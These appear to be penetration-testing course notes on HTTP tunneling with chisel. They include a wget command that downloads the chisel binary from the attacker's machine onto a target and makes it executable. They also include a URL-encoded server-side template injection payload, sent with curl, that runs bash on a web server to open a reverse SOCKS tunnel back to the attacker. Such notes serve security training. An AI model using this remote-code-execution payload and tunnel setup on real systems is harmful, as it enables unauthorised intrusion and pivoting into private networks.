Tunneling Theory & Practice

20.2.1 - HTTP tunneling with chisel

HTTP tunneling tool that encapsulates our data stream within HTTP. It also uses the SSH protocol within the tunnel so our data will be encrypted. Chisel uses a client/server model. The example is using a web injection payload

We'll need to send the chisel.exe binary over to the target

Download the binary from the http/apache server. We should see a log of the request

wget 192.168.118.4/chisel -O /tmp/chisel && chmod +x /tmp/chisel

We can run tcpdump on Kali to further log any incoming traffic

sudo tcpdump -nvvvXi tun0 tcp port 8080

Note the version of Chisel you use might be important here as some versions of glibc on targets dont work with Chisel if it was compiled with a newer version of Go

Running the chisel client on our target through a URL encoded web shell vulnerability. Our usage may differ and utilize the command line remotely instead.

curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.118.4:8080%20R:socks%27%29.start%28%29%22%29%7D/

Run the Chisel server on Kali. Remember we can check SOCKS proxy status with ss -ntplu

chisel server --port 8080 --reverse